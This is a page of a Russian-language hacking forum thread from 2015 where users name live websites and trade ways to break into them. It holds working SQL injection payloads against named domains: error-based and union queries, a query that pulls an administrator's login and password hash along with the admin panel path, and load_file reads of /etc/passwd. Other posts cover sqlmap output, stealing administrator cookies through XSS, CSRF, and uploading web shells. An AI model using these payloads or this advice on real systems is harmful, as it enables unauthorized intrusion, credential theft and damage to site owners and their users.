PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 [4] 5 6 7 8 9 10 11 12

R3hab
23.10.2015, 10:08
HTML:
http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27

что можно сделать?

kacergei
23.10.2015, 13:32
R3hab said:
↑ (https://antichat.live/posts/3905840/)

HTML:
http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27

что можно сделать?


sqlmap берет


Code:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=3' AND (SELECT * FROM (SELECT(SLEEP(5)))mWsI) AND 'FCqd'='FCqd
---
[12:26:48] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.6.0, Apache 2.4.10
back-end DBMS: MySQL 5.0.12

Базы:

available databases [3]:

elektroline

information_schema

test

RWD
23.10.2015, 18:51
http://abendblatt.ergebnisdienst-fussball.de/index.php?liga=2511 (http://abendblatt.ergebnisdienst-fussball.de/index.php?liga=2511)'

кто зальется, сообщите как?

Roger96
24.10.2015, 00:39
Кто знает? http://screenshot.ru/2df66597e6da02e321e7f4abbfcdeff9.png

xivi00
24.10.2015, 00:40
http://www.navistory.kr/shop/m_navi...M+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+ x)a) (http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=%28SELECT+1+and+ROW%281%2c1%29%3E%28SELECT+COUN T%28*%29%2cCONCAT%28CHAR%2895%29%2cCHAR%2833%29%2c CHAR%2864%29%2cCHAR%2852%29%2cCHAR%28100%29%2cCHAR %28105%29%2cCHAR%28108%29%2cCHAR%28101%29%2cCHAR%2 8109%29%2cCHAR%28109%29%2cCHAR%2897%29%2c0x3a%2cFL OOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA .COLLATIONS+GROUP+BY+x%29a%29)

sqlmap как в нем таблици вытащить что то чар не пагет(

ButilkaSoka
24.10.2015, 01:05
xivi00 said:
↑ (https://antichat.live/posts/3906235/)
http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=(SELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64) ,CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101), CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2) )x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a ) (http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=%28SELECT+1+and+ROW%281%2c1%29%3E%28SELECT+COUN T%28*%29%2cCONCAT%28CHAR%2895%29%2cCHAR%2833%29%2c CHAR%2864%29%2cCHAR%2852%29%2cCHAR%28100%29%2cCHAR %28105%29%2cCHAR%28108%29%2cCHAR%28101%29%2cCHAR%2 8109%29%2cCHAR%28109%29%2cCHAR%2897%29%2c0x3a%2cFL OOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA .COLLATIONS+GROUP+BY+x%29a%29)
sqlmap как в нем таблици вытащить что то чар не пагет(




Code:
http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=-1/*! and 1=1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12, 13,14,15+from+information_schema.tables+where+tabl e_schema=database()*/+--

TopTG
24.10.2015, 01:16
Ребята подскажите, есть сайт на Drupal 7.34. Нет доступа с правами администратора но есть доступ в качестве юзера. Есть ли у этой версии какие то уязвимости? как получить доступ к админу? хочу залить шелл и получить доступ к файлам.

kacergei
24.10.2015, 06:30
TopTG said:
↑ (https://antichat.live/posts/3906252/)
Ребята подскажите, есть сайт на Drupal 7.34. Нет доступа с правами администратора но есть доступ в качестве юзера. Есть ли у этой версии какие то уязвимости? как получить доступ к админу? хочу залить шелл и получить доступ к файлам.



.SpoilerTarget" type="button">Spoiler: Смотри тут
https://www.cvedetails.com/vulnerab...387/version_id-181083/Drupal-Drupal-7.34.html (https://www.cvedetails.com/vulnerability-list/vendor_id-1367/product_id-2387/version_id-181083/Drupal-Drupal-7.34.html)

R3hab
24.10.2015, 13:27
HTML:
http://musics.bdwebs.tk/listen.php?id=fRh_vgS2dFE*

как то можно использовать эту ошибку?

TopTG
24.10.2015, 21:46
kacergei said:
↑ (https://antichat.live/posts/3906293/)
Spoiler: Смотри тут
https://www.cvedetails.com/vulnerab...387/version_id-181083/Drupal-Drupal-7.34.html (https://www.cvedetails.com/vulnerability-list/vendor_id-1367/product_id-2387/version_id-181083/Drupal-Drupal-7.34.html)


спасибо за ответ. как я понял по ссылке список уязвимость. но как человек имеющий базовые знания но первый раз сталкивающийся с этим, можете в качестве примеров описать коротко по шагам как это применять, по примерам я пойму не совсем чайник.

TopTG
24.10.2015, 21:48
R3hab said:
↑ (https://antichat.live/posts/3906347/)

HTML:
http://musics.bdwebs.tk/listen.php?id=fRh_vgS2dFE*

как то можно использовать эту ошибку?


и вам спасибо за ответ, по ссылке кнопка скачать.. дальше что делать как применять, пожалуйста не бросайте, объясните как надо я пойму.. очень нужны файлы!

kpa6
25.10.2015, 03:57
Приветствую!

Как в Metasploit подобрать нужный эксплоит?

Руками тыкать ужасно долго и нудно.

Есть ли альтернатива?

qaz
25.10.2015, 15:19
как крутится Инъекция в LIMIT после ORDER BY?

Br@!ns
25.10.2015, 16:42
qaz said:
↑ (https://antichat.live/posts/3906674/)
как крутится Инъекция в LIMIT после ORDER BY?


PROCEDURE ANALYSE мб?

qaz
25.10.2015, 17:01
Br@!ns said:
↑ (https://antichat.live/posts/3906700/)
PROCEDURE ANALYSE мб?


хз,

к примеру запрос

select * from article order by id limit 100,25

как мне составить запрос на выборку из другой таблици?

faza02
25.10.2015, 17:34
qaz said:
↑ (https://antichat.live/posts/3906710/)
хз,
к примеру запрос
select * from article order by id limit
100
,25
как мне составить запрос на выборку из другой таблици?


вам выше подсказали. либо blind, либо error-based. на рдоте есть статья

qaz
25.10.2015, 17:42
yarbabin said:
↑ (https://antichat.live/posts/3906717/)
вам выше подсказали. либо blind, либо error-based. на рдоте есть статья


что мне подсазали? мне написали пару слов


PROCEDURE ANALYSE мб?


вот я спросил как составить запрос, так как мало представляю о том что можно вставить после лимита

ПС: рдот лежит уже давно

}{@ker
25.10.2015, 21:56
phpMyAdmin/scripts/setup.php.Что можете посоветовать?

http://s020.radikal.ru/i723/1510/c2/4993371de002.png

Roger96
25.10.2015, 22:31
Burp нашел такие sql: http://i.shotnes.com/a/25/kd5e0ash.k05_562d2001b6373.png

как с них базу снять?

sqlmap пишет все параметны not injectable,sqldumper пишет просто mysql

psihoz26
25.10.2015, 22:53
qaz said:
↑ (https://antichat.live/posts/3906710/)
хз,
к примеру запрос
select * from article order by id limit
100
,25
как мне составить запрос на выборку из другой таблици?


Вывод ошибок есть?

qaz
25.10.2015, 23:03
psihoz26 said:
↑ (https://antichat.live/posts/3906852/)
Вывод ошибок есть?


да

segodnya
26.10.2015, 07:44
нашел SQL инъекцию, попробовал через Havij , не отображает название столбцов баз данных.

скрин-шот: http://i.imgur.com/j2yMOWB.png

Сама инъекция:


http://stop-obman.ru/websites.html?cid=1&rid=1&name=1&sort=score&Subjects_page=1
'


Вопрос, что можно сделать.

faza02
26.10.2015, 08:38
qaz said:
↑ (https://antichat.live/posts/3906856/)
да


http://www.securitylab.ru/news/470546.php

Konqi
26.10.2015, 08:38
segodnya said:
↑ (https://antichat.live/posts/3906933/)
Вопрос, что можно сделать.


http://stop-obman.ru/websites.html?...r(extractvalue(1,concat(0x3a,vers ion())))=('1 (http://stop-obman.ru/websites.html?cid=1&rid=1&name=1&sort=score&Subjects_page=')or(extractvalue(1,concat(0x3a,vers ion())))=('1)

руками надо

segodnya
26.10.2015, 08:40
Konqi said:
↑ (https://antichat.live/posts/3906942/)
http://stop-obman.ru/websites.html?...r(extractvalue(1,concat(0x3a,vers ion())))=('1 (http://stop-obman.ru/websites.html?cid=1&rid=1&name=1&sort=score&Subjects_page=')or(extractvalue(1,concat(0x3a,vers ion())))=('1)
руками надо


спасибо, вот только не вижу, что мы вывели данным запросом.

как вывести логин / пароль id1 т.е администратора

Konqi
26.10.2015, 09:40
segodnya said:
↑ (https://antichat.live/posts/3906943/)
спасибо, вот только не вижу, что мы вывели данным запросом.


как не видешь


XPATH syntax error: ':5.1.73'.




segodnya said:
kак вывести логин / пароль id1 т.е администратора


это уже сам

psihoz26
26.10.2015, 10:27
qaz said:
↑ (https://antichat.live/posts/3906856/)
да


https://rdot.org/forum/showpost.php?p=36186&

Тут есть пример эксплуатации

xivi00
26.10.2015, 13:20
segodnya said:
↑ (https://antichat.live/posts/3906943/)
спасибо, вот только не вижу, что мы вывели данным запросом.
как вывести логин / пароль id1 т.е администратора


http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+'0:0:25'-- (http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+%270%3a0%3a 25%27--)

Target: http://stop-obman.ru/organizations.html?rid=1

Host IP: 217.12.206.101

Web Server: nginx

Powered-by: PHP/5.3.3

DB Server: MySQL error based

Resp. Time(avg): 889 ms

Sql Version: 5.1.73

Current DB: raferti_stopobman

Host Name: rafer685.vds

Compile OS: redhat-linux-gnu

Installation dir: /usr/

segodnya
26.10.2015, 14:30
xivi00 said:
↑ (https://antichat.live/posts/3907022/)
http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+'0:0:25'-- (http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+%270%3a0%3a 25%27--)
Target:
http://stop-obman.ru/organizations.html?rid=1
Host IP: 217.12.206.101
Web Server: nginx
Powered-by: PHP/5.3.3
DB Server: MySQL error based
Resp. Time(avg): 889 ms
Sql Version: 5.1.73
Current DB: raferti_stopobman
Host Name: rafer685.vds
Compile OS: redhat-linux-gnu
Installation dir: /usr/



CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.' at line 1. The SQL statement executed was: SELECT COUNT(DISTINCT `t`.`id`) FROM `subject` `t` LEFT OUTER JOIN `organization` `rl_orgs` ON (`rl_orgs`.`subject`=`t`.`id`) WHERE (((((type='1') AND (rl_orgs.region = '1 WAITFOR DELAY '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.enable=1))

если получится, скинь логин/пароль в лс

Br@!ns
26.10.2015, 14:48
segodnya said:
↑ (https://antichat.live/posts/3906943/)
спасибо, вот только не вижу, что мы вывели данным запросом.
как вывести логин / пароль id1 т.е администратора


А сами не умеете вообще? учитесь.

http://stop-obman.ru/organizations....*/from/**/user/**/where/**/role='root'))))='1 (http://stop-obman.ru/organizations.html?rid=1'or(ExtractValue(1,concat( 0x3a,(select/**/mid(concat_ws(':',login,password),1,32)/**/from/**/user/**/where/**/role='root'))))='1)

пароль есть на cmd5

админка по адресу stop-obman.ru/backend будет

http://rghost.net/6V6LDy9Mj/image.png

segodnya
26.10.2015, 15:13
Br@!ns said:
↑ (https://antichat.live/posts/3907049/)
А сами не умеете вообще? учитесь.
http://stop-obman.ru/organizations....*/from/**/user/**/where/**/role='root'))))='1 (http://stop-obman.ru/organizations.html?rid=1'or(ExtractValue(1,concat( 0x3a,(select/**/mid(concat_ws(':',login,password),1,32)/**/from/**/user/**/where/**/role='root'))))='1)
пароль есть на cmd5
админка по адресу stop-obman.ru/backend будет
http://rghost.net/6V6LDy9Mj/image.png



спасибо большое, а вы как я вижу шелл залили? если можно в лс дайте.

да тренируюсь на Linux kali, читаю. учусь.

и еще вопрос, это точно md5 да ?

xivi00
26.10.2015, 16:21
есть тут что нибудь https://smartwm.ru/login-with-social/'

xivi00
26.10.2015, 16:41
SaNDER said:
↑ (https://antichat.live/posts/3907104/)
если этот 404,то там скорее всего нечего нету .


там 500

http://i.imgur.com/Outg7kb.png

BabaDook
26.10.2015, 17:57
xivi00 said:
↑ (https://antichat.live/posts/3907114/)
там 500
http://i.imgur.com/Outg7kb.png


ахринеть , о чём говорить 500 ошибка ?

}{@ker
26.10.2015, 18:06
phpMyAdmin/scripts/setup.php.Что можете посоветовать?

http://s020.radikal.ru/i723/1510/c2/4993371de002.png

Еще раз,извиняюсь.

BabaDook
27.10.2015, 00:53
SaNDER said:
↑ (https://antichat.live/posts/3907283/)
shop.faberlic.com/ru/component/consultant/conscontent?layout=edit&idcontenttype=3&returnurl=aHR0cDovL3Nob3AuZmFiZXJsaWMuY29tL3VhL2Nv bnNjYXJlZXI=
без всякой авторизации...но при сохрании ошибка CC_SYSTEM_ERROR
http://shop.faberlic.com/component/...vL3Nob3AuZmFiZXJsaWMuY29tL3VhL2NvbnNjYXJlZXI= (http://shop.faberlic.com/component/consultant/conscontent?layout=edit&idcontenttype=3&returnurl=aHR0cDovL3Nob3AuZmFiZXJsaWMuY29tL3VhL2Nv bnNjYXJlZXI=)
пытался XSS юзануть но выводит "alert . Есть идеи?
тут скул ошибка,но я тут не чего,не понятно .
http://shop.faberlic.com/component/catalog?id[]=1000243641377&view=seriesitem
http://shop.faberlic.com/component/...&sort=&taskaction=getlistgoods&view=listgoods (http://shop.faberlic.com/component/catalog/index.php?format=raw&fprop[][]=1000195840751&idcategory=1000209995122&option=com_catalog&sort=&taskaction=getlistgoods&view=listgoods)


Случайно сканер не ахунейтик? ошибки из-за []

Br@!ns
27.10.2015, 16:17
xivi00 said:
↑ (https://antichat.live/posts/3907498/)
подскажите есть ли тут вообще уязвимость
http://www.regard.ru/ajax/check_order.php?num=4444' (http://www.regard.ru/ajax/check_order.php?num=4444%27)
все что можно перепробовал продвижений нет(


С твоей непонятно, но есть другая:

http://www.regard.ru/comparen.htm?i...Value(1,concat(0x3a,(select(versi on())))))='1 (http://www.regard.ru/comparen.htm?id=e345280615ca44adab458f949c114dea'o r(ExtractValue(1,concat(0x3a,(select(version())))) )='1)

или

http://www.regard.ru/comparen.htm?id=e345280615ca44adab458f949c114de1a' +union+select+1,user()+--+

regard@localhost

5.5.44-0+deb7u1-log

Вывод в самом низу страницы (проще в коде глянуть)

Konqi
27.10.2015, 16:40
Br@!ns said:
↑ (https://antichat.live/posts/3907520/)
С твоей непонятно, но есть другая:


там тоже работает, если передать массив вместо строки.

2 all. перестаньте постить нераскрученные скули и отчеты ваших сканеров. старайтесь все делать сами, а если что то и не выходит то опишите конкретно проблему, что именно не получаеться.

qaz
27.10.2015, 17:50
psihoz26 said:
↑ (https://antichat.live/posts/3906960/)
https://rdot.org/forum/showpost.php?p=36186&
Тут есть пример эксплуатации


1) почитал обе статьи (http://www.securitylab.ru/news/470546.php)

есть проблемы, например при запросе


+procedure+analyse(extractvalue(rand(),concat(0x3a ,version())),1)--+


пишет


FUNCTION dbphoto.extractvalue does not exist


как то решается эта проблема?

2) нашел нужные мне таблицу и колонку


+procedure+analyse((select+user_password+from+foru m.phpbb_users+limit+1,1),1)--+


тоесть ответ


Описание ошибки: Incorrect parameters to procedure 'analyse'


зх как составить запрос чтобы хотяб через блинд вывести данные

faza02
27.10.2015, 19:08
qaz said:
↑ (https://antichat.live/posts/3907548/)
1) почитал обе статьи (
http://www.securitylab.ru/news/470546.php
)
есть проблемы, например при запросе
пишет
как то решается эта проблема?
2) нашел нужные мне таблицу и колонку
тоесть ответ
зх как составить запрос чтобы хотяб через блинд вывести данные


у вас версия ниже 5.1, используйте другой error-based вектор

qaz
27.10.2015, 20:22
yarbabin said:
↑ (https://antichat.live/posts/3907576/)
а blind работает и без procedure analyse


а как составить вектор для blind работает и без procedure analyse?

qaz
27.10.2015, 23:57
yarbabin said:
↑ (https://antichat.live/posts/3907659/)
хотя я забыл еще уточнить, в запросе есть order by?


да есть я писал об етом


yarbabin said:
↑ (https://antichat.live/posts/3907659/)
а blind, как обычно, and substring(version(),1,1)=5


после лимита "and" как это?

ButilkaSoka
28.10.2015, 00:22
Хелп.

Тема такая, не могу вывести данные.


Code:
http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,/*!unhex(hex(group_concat(table_name)))*/,26,27,28,29 from {f information_schema.tables} --+ or ''='

в schema_name есть twinsspe_twins, но не выводится из неё инфа.

скорей всего нету там просто ничего.

kingbeef
28.10.2015, 09:35
ButilkaSoka said:
↑ (https://antichat.live/posts/3907688/)
Хелп.
Тема такая, не могу вывести данные.

Code:
http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,/*!unhex(hex(group_concat(table_name)))*/,26,27,28,29 from {f information_schema.tables} --+ or ''='

в schema_name есть twinsspe_twins, но не выводится из неё инфа.
скорей всего нету там просто ничего.


Ты работаешь под этой БД. В твоем запросе как раз и выводятся таблицы из этой БД.

Paladin
29.10.2015, 00:45
http://kvestsetevichok.ru/index.php/press?view=category&id=' (http://kvestsetevichok.ru/index.php/press?view=category&id=%27) что то можно сделать? ибо не получается изменить запрос никак

Br@!ns
29.10.2015, 10:43
Paladin said:
↑ (https://antichat.live/posts/3908069/)
http://kvestsetevichok.ru/index.php/press?view=category&id=' (http://kvestsetevichok.ru/index.php/press?view=category&id=%27)
что то можно сделать? ибо не получается изменить запрос никак


Зачем вы кавычку вконце поставили я вообще не пойму.

Unknown column 'root' in 'where clause'

Обычная ошибка бд, никакой sql inj

xivi00
31.10.2015, 01:04
vikler said:
↑ (https://antichat.live/posts/3908929/)
Ребят, по сайту. Что дальше делать, кто-нибудь может показать пример для вывода чего-нибудь из information schema к примеру? sqlmap не может ничего вывести,хотя boolean уязвимость явно есть. Придётся вручную.. просто натолкните на верный путь плиз)
Сабж:

Code:
http://indigital{GOOGLEINDEX}images.com/indigital/{GOOGLEINDEX}ecommerce/catalogo.do?tab_07=1800&tab_06=2619+and+1=1&tab_09=1343&tab_04=1348



И где там уязвимость?*

vikler
31.10.2015, 01:06
xivi00 said:
↑ (https://antichat.live/posts/3908937/)
И где там уязвимость?*


ну как бы, tab_06

tab_06=2619+and+1=1 [true=>корректрый вывод]

tab_06=2619+and+1=2 [false=>пустой вывод]

xivi00
31.10.2015, 01:16
vikler said:
↑ (https://antichat.live/posts/3908938/)
ну как бы, tab_06
tab_06=2619+and+1=1 [true=>корректрый вывод]
tab_06=2619+and+1=2 [false=>пустой вывод]


Извеняюсь протупил

XAMEHA
01.11.2015, 18:09
SaNDER said:
↑ (https://antichat.live/posts/3909028/)
Хорошо другой вопрос ssh-shop.in/captcha/?route=captcha">prompt(947944)




Code:
GET /captcha/?route=captcha">prompt(947944) HTTP/1.1
Host: ssh-shop.in



Code:
HTTP/1.1 200 OK
...
prompt(947944)">
prompt(947944)">

GroM88
01.11.2015, 20:17
Ребят) вопрос такой вообщем есть фича на сайте типо добления в blacklist мембера например который тебе не приятен) суть не в этом)

Когда добовляешь мембера в блэк вылазит поле для ввода коментария ( ну мол потом когда заходишь на его страницу виден этот коментарий только тебе )

Суть вопроса в том, вообщем я заметил что в это поле отлично вставляется html код и он работает .)

Есть ли возможность что то придумать через html ...

Сорри за идиотский вопрос 200 лет уже не занимался ничем подобным)) все позабыл)

faza02
01.11.2015, 21:02
GroM88 said:
↑ (https://antichat.live/posts/3909541/)
Ребят) вопрос такой вообщем есть фича на сайте типо добления в blacklist мембера например который тебе не приятен) суть не в этом)
Когда добовляешь мембера в блэк вылазит поле для ввода коментария ( ну мол потом когда заходишь на его страницу виден этот коментарий только тебе )
Суть вопроса в том, вообщем я заметил что в это поле отлично вставляется html код и он работает .)
Есть ли возможность что то придумать через html ...
Сорри за идиотский вопрос 200 лет уже не занимался ничем подобным)) все позабыл)


XSS же

winstrool
01.11.2015, 21:16
GroM88 said:
↑ (https://antichat.live/posts/3909541/)
Ребят) вопрос такой вообщем есть фича на сайте типо добления в blacklist мембера например который тебе не приятен) суть не в этом)
Когда добовляешь мембера в блэк вылазит поле для ввода коментария ( ну мол потом когда заходишь на его страницу виден этот коментарий только тебе )
Суть вопроса в том, вообщем я заметил что в это поле отлично вставляется html код и он работает .)
Есть ли возможность что то придумать через html ...
Сорри за идиотский вопрос 200 лет уже не занимался ничем подобным)) все позабыл)


Возможно, скорее всего, он также виден админам, что может привести к выдиранию админских куков

GroM88
01.11.2015, 21:18
winstrool said:
↑ (https://antichat.live/posts/3909569/)
Возможно, скорее всего, он также виден админам, что может привести к выдиранию админских куков


Возможно, но думаю что врятли ибо если представить что например этого пользователя добавило в блэк хотя бы 100-200 человек, тогда админ зайдет на его страницу, он устанет читать различную по3б3нь возле его ника в профиле))

{iddqd}
01.11.2015, 21:33
через XSS можно сделать многое, вплоть до автоматической заливки шелла:

/threads/50646/#post-584229 (https://antichat.live/threads/50646/)

отлови http пакет во время добавления юзера в блек и инжектируй туда свой evil код

winstrool
01.11.2015, 22:44
GroM88 said:
↑ (https://antichat.live/posts/3909573/)
Возможно, но думаю что врятли ибо если представить что например этого пользователя добавило в блэк хотя бы 100-200 человек, тогда админ зайдет на его страницу, он устанет читать различную по3б3нь возле его ника в профиле))


Админа можно и попросить зайти на страницу, с мотивировать его чем либо!

GroM88
01.11.2015, 23:12
winstrool said:
↑ (https://antichat.live/posts/3909608/)
Админа можно и попросить зайти на страницу, с мотивировать его чем либо!


Админа пригласить на страницу проблемы нет никакой)

проблема у меня в том что в xss у меня нет как токовых знаний и практики)

yarbabin, подсказал запилить alert()

Вообщем вписал, никаких изменений не было)

В профиле получается написан ник пользователя например ATMOSFERA (тут в скобочках отображается причина)

В моем случае просто получились простые скобочки)

Сорян что пишу куйню эту всю) но в xss вообще нет никаких познаний)

Пните меня в нужное русло с подсказками) может какой еще код попробовать внедрить)

Пробовал запилить и вызвать http://site.ru/member.html?id=12547&c=phpinfo();

Не получилось)) куйню наверно делаю))

XAMEHA
01.11.2015, 23:20
GroM88, Читай статьи по XSS.

gQd
02.11.2015, 11:41
Через havij раскрутил скулю, в итоге нашлась одна база "information_schema" как не пытался найти данные пользователей, бесполезно, где могут хранится данные? сорри за нюбский вопрос, заранее благодарен за помощь.

Br@!ns
02.11.2015, 11:50
gQd said:
↑ (https://antichat.live/posts/3909733/)
Через havij раскрутил скулю, в итоге нашлась одна база "information_schema" как не пытался найти данные пользователей, бесполезно, где могут хранится данные? сорри за нюбский вопрос, заранее благодарен за помощь.


information_schema - системная база с системными таблицами, в ней нет юзеров. Основная база сайта - другая. И не факт что там будут данные пользователей.

BabaDook
02.11.2015, 16:13
Ребятки такой вопрос. Возможно ли отослать письмо на маил почту @mail.ru с hml так что бы при получении его, получатель открыл и отработал JS. Но имеено при открывании его.

WallHack
02.11.2015, 16:31
BabaDook said:
↑ (https://antichat.live/posts/3909965/)
Ребятки такой вопрос. Возможно ли отослать письмо на маил почту @mail.ru с hml так что бы при получении его, получатель открыл и отработал JS. Но имеено при открывании его.


Если у тебя актуальная xss то да

BabaDook
02.11.2015, 16:51
WallHack said:
↑ (https://antichat.live/posts/3909974/)
Если у тебя актуальная xss то да


а блин, вот этот момент я и упустил.

GroM88
03.11.2015, 03:00
Вообщем вернусь опять к вам за помощью по данному вопросу.


GroM88 said:
↑ (https://antichat.live/posts/3909541/)
Ребят) вопрос такой вообщем есть фича на сайте типо добления в blacklist мембера например который тебе не приятен) суть не в этом)
Когда добовляешь мембера в блэк вылазит поле для ввода коментария ( ну мол потом когда заходишь на его страницу виден этот коментарий только тебе )
Суть вопроса в том, вообщем я заметил что в это поле отлично вставляется html код и он работает .)
Есть ли возможность что то придумать через html ...
Сорри за идиотский вопрос 200 лет уже не занимался ничем подобным)) все позабыл)


Суть такова, xss то. а толку от нее никакого. Т.к. Админ при заходе на страницу пользователя которого я добавил в блэк не видит коментарий который я написал при добавлении этого пользователя к себе в блэк. Собственно, xss не вариант, т.к. работать она будет только с моего аккаунта.

При добавлении кометария вида , php-инфо конешно же не выводится( но посмотрев исходный код страницы я обнаружил что код добавлися в таком виде

Подскажи что еще можно попробовать) Заранее очень благодарен...)

faza02
03.11.2015, 10:23
через CSRF сделать полноценную XSS

psihoz26
03.11.2015, 10:38
GroM88 said:
↑ (https://antichat.live/posts/3910310/)
Вообщем вернусь опять к вам за помощью по данному вопросу.
Суть такова, xss то. а толку от нее никакого. Т.к. Админ при заходе на страницу пользователя которого я добавил в блэк не видит коментарий который я написал при добавлении этого пользователя к себе в блэк. Собственно, xss не вариант, т.к. работать она будет только с моего аккаунта.
При добавлении кометария вида , php-инфо конешно же не выводится( но посмотрев исходный код страницы я обнаружил что код добавлися в таком виде
Подскажи что еще можно попробовать) Заранее очень благодарен...)


какой движок?

GroM88
03.11.2015, 11:34
yarbabin said:
↑ (https://antichat.live/posts/3910370/)
через CSRF сделать полноценную XSS


Чучуть поподробнее пжлст) или хотя ткните носом в пруф где описано как это делается...

А то читать все..и практиковать уйдет куча времени... которого и так впринципе то нет(


psihoz26 said:
↑ (https://antichat.live/posts/3910378/)
какой движок?


Индивидуальный, самописанный))

Точнее сказал бы пару лет назад писали одни, а фичу с добавлением коментариев уже не так давно дописал другой)

Заранее всем благодарен за помощь.

BabaDook
03.11.2015, 14:16
PHP:
http://www.matrasmax.ru/konfigurator/?on_page=15&price_active=0&height_active=0&type=&size=131&producer_46=on&producers=&price_from=0&price_to=12000&materials=&stronger1=ТУТ &stronger2=&text=&action=apply_filter

Инъекция?

GroM88
03.11.2015, 15:15
GroM88 said:
↑ (https://antichat.live/posts/3910310/)
При добавлении кометария вида , php-инфо конешно же не выводится( но посмотрев исходный код страницы я обнаружил что код добавлися в таком виде


Ребята, так понимаю там стоит какой то чудо фильтр на

Konqi
03.11.2015, 15:27
[QUOTE="GroM88"]
GroM88 said:
↑ (https://antichat.live/posts/3910483/)
Ребята, так понимаю там стоит какой то чудо фильтр на phpinfo();

но что то сомневаюсь что сработает в твоем случай. почти уверен что данные записываються в базу и оттуда выводяться

GroM88
03.11.2015, 15:34
Konqi said:
↑ (https://antichat.live/posts/3910488/)
phpinfo();
но что то сомневаюсь что сработает в твоем случай. почти уверен что данные записываються в базу и оттуда выводяться


коментирует падла(

Если же записывает в базу, то вариантов нет больше никаких?) точнее я имел ввиду бесполезно что то пробовать?

Konqi
03.11.2015, 15:39
GroM88 said:
↑ (https://antichat.live/posts/3910490/)
коментирует падла(
Если же записывает в базу, то вариантов нет больше никаких?) точнее я имел ввиду бесполезно что то пробовать?


да, код не обрабатываеться интерпретатором. Если программист сильно не перестарался то ничего не выйдет.

GroM88
03.11.2015, 15:39
Konqi said:
↑ (https://antichat.live/posts/3910488/)
phpinfo();
но что то сомневаюсь что сработает в твоем случай. почти уверен что данные записываються в базу и оттуда выводяться


phpinfo(); таким способом я пробовал уже) не выводит phpinfo (

Konqi
03.11.2015, 15:45
GroM88 said:
↑ (https://antichat.live/posts/3910496/)
phpinfo(); таким способом я пробовал уже) не выводит phpinfo (


значит копай в другую сторону

psihoz26
03.11.2015, 16:03
GroM88 said:
↑ (https://antichat.live/posts/3910398/)
Чучуть поподробнее пжлст) или хотя ткните носом в пруф где описано как это делается...
А то читать все..и практиковать уйдет куча времени... которого и так впринципе то нет(
Индивидуальный, самописанный))
Точнее сказал бы пару лет назад писали одни, а фичу с добавлением коментариев уже не так давно дописал другой)
Заранее всем благодарен за помощь.


откуда тогда знаешь что админ не видит коменарий?

GroM88
03.11.2015, 16:35
psihoz26 said:
↑ (https://antichat.live/posts/3910513/)
откуда тогда знаешь что админ не видит коменарий?


Узнавал через знакомого модератора, модератор узнавал у админа.

Да и логически подумать, на сайте куева туча пользователей, ежедневно одного и того же пользователя добавляют в ЧС 10 - 20 человек.

Вообщем инфа 100% что админ не видит.

{iddqd}
03.11.2015, 22:22
да какой

php код выполняется на стороне сервера, а в браузере может сработать только javascript

errorbaser
04.11.2015, 08:59
Есть инъекция вида:

extractvalue(1,concat(0x5c,(SELECT substring((*),1,32) FROM * limit 0,1)))

С правами file_priv='Y'.

Как помощью ее, можно читать файли на сервере?

kingbeef
04.11.2015, 10:51
errorbaser said:
↑ (https://antichat.live/posts/3910818/)
Есть инъекция вида:
extractvalue(1,concat(0x5c,(SELECT substring((*),1,32) FROM * limit 0,1)))
С правами file_priv='Y'.
Как
с помощью (https://www.google.co.in/search?q=%D1%81+%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1% 8C%D1%8E&spell=1&sa=X&ved=0CBoQvwUoAGoVChMIzrzC2f31yAIVF9djCh1RFg8j)
ее, можно читать файли на сервере?


extractvalue(1,concat(0x5c,(SELECT load_file('/etc/passwd')))) выведет только 31 символ, далее используй mid

mid(load_file('/etc/passwd'),1,30)

c 1 символа выводим 30 символов

GroM88
04.11.2015, 13:05
{iddqd} said:
↑ (https://antichat.live/posts/3910713/)
да какой
php код выполняется на стороне сервера, а в браузере может сработать только javascript


Ты видимо не читал предыдущие посты, либо не совсем понял в чем проблема.

Ссылка идет вида http://megasite.ru/member.html?id=54321

При добавлении коментария Если добавлть html код, он отлично врезается в страницу и выполняется, java script тоже выполняется. А вот когда добавляешь php код например то он не выполняется потому что стоит какой то чудо фильтр на

Konqi,капать там больше некуда) вот добавили этот баговый коментарий к добавлению мембера в ЧС)

faza02
04.11.2015, 13:20
GroM88 said:
↑ (https://antichat.live/posts/3910874/)
Ты видимо не читал предыдущие посты, либо не совсем понял в чем проблема.
Ссылка идет вида
http://megasite.ru/member.html?id=54321
